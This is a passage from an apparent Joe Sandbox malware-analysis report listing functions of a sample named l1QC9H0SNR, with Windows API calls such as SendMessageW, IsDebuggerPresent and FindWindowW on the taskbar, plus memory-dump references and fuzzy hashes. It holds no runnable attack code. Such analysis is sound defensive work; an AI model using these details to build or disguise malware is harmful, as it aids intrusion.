                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: ef028c78aacb7baf6cac9d3f29ea0c62af09764b6934bb3ca892b19e5cfe5428
                                              • Instruction ID: bf7f5557e49c6cace960f772e058fa56a64f5481f94ab5ad0401f0794fc61e5d
                                              • Opcode Fuzzy Hash: ef028c78aacb7baf6cac9d3f29ea0c62af09764b6934bb3ca892b19e5cfe5428
                                              • Instruction Fuzzy Hash: 9B01F5B1A49219EBCB15EBA0CC919FE73E8EF06320B0046A9BC21672E1DE35580CC660
                                              Function 00BA8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA8D6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: f73d6cc4103e42e58f911f6834a7dd0a1473d1443485ac5bbbc020f34eba2661
                                              • Instruction ID: 296a4ebf55f41b78ca4582888f35d796164f0de5b4b232a48e7111c88aa3d984
                                              • Opcode Fuzzy Hash: f73d6cc4103e42e58f911f6834a7dd0a1473d1443485ac5bbbc020f34eba2661
                                              • Instruction Fuzzy Hash: F001D4B1B45109ABCB15EBA0C996AFE73E8DF16300F1041B9B842672E1DE255E0CD271
                                              Function 00BA8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA8DEE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 5d664bc712452af02411774c74a77029d1fc76992dcabac93f0708f3e3f706fc
                                              • Instruction ID: d000c5a8d6399b993819b24f87c94642722d2523dfab1dd73b17bb7539049d9c
                                              • Opcode Fuzzy Hash: 5d664bc712452af02411774c74a77029d1fc76992dcabac93f0708f3e3f706fc
                                              • Instruction Fuzzy Hash: 6201F2B1B49109A7CB25EAA4C992AFE77E8CF16300F1041A9BC42772E2DE255E0CD271
                                              Function 00BB4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                              • Instruction ID: 628a162c51e579d7371e2d40d5c8919743a72f94ae03802b84c1a15a9c0a0d34
                                              • Opcode Fuzzy Hash: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                              • Instruction Fuzzy Hash: DCE09232A042292BE7209A99AC4ABF7FBECEB55B60F004067FD44D3051EA709A45C7E0
                                              Function 00B8B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B8B314: _memset.LIBCMT ref: 00B8B321
                                                • Part of subcall function 00B70940: InitializeCriticalSectionAndSpinCount.KERNEL32(00C14158,00000000,00C14144,00B8B2F0,?,?,?,00B5100A), ref: 00B70945
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00B5100A), ref: 00B8B2F4
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B5100A), ref: 00B8B303
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B8B2FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                              • Instruction ID: 102c37c2372bfff6491d8dc6aabe280b960b9cb8df58230c8d3c8ba750d8b383
                                              • Opcode Fuzzy Hash: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                              • Instruction Fuzzy Hash: C4E06D71600702CBD720AF38E814756BBE4BF04314F0489ADF856C76A1EBB4D408CBA1
                                              Function 00B91935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B91775
                                                • Part of subcall function 00BCBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B9195E,?), ref: 00BCBFFE
                                                • Part of subcall function 00BCBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BCC010
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B9196D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                              • Instruction ID: 3cd40d19ead060c6bbd18cc40185eb09339770a56686d1aeb62c1d5b8c0557f1
                                              • Opcode Fuzzy Hash: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                              • Instruction Fuzzy Hash: 04F0A5B080510ADFDB15DB95C9D4BECBBF8AB08301F5404EAE102A31A0DB758F84EF60
                                              Function 00BD5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD59AE
                                              • PostMessageW.USER32(00000000), ref: 00BD59B5
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                              • Instruction ID: c57dec13077628148c3b280427c63425869734b6139e0af1890d3f916be4ee82
                                              • Opcode Fuzzy Hash: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                              • Instruction Fuzzy Hash: 8CD0C9313863127BEA64BB70AC1BFE6A655BB14B50F040836B346AB1D0DDE0A800C658
                                              Function 00BD5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD596E
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD5981
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                              • Instruction ID: 8f69f5b97d33bf3c161b63b9b85ab2f5661cb8f956bf7db0aca94365f5f5670e
                                              • Opcode Fuzzy Hash: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                              • Instruction Fuzzy Hash: BAD0C935389312B7EA64BB70AC2BFE6AA55BB10B50F040836B34AAB1D0DDE0A800C654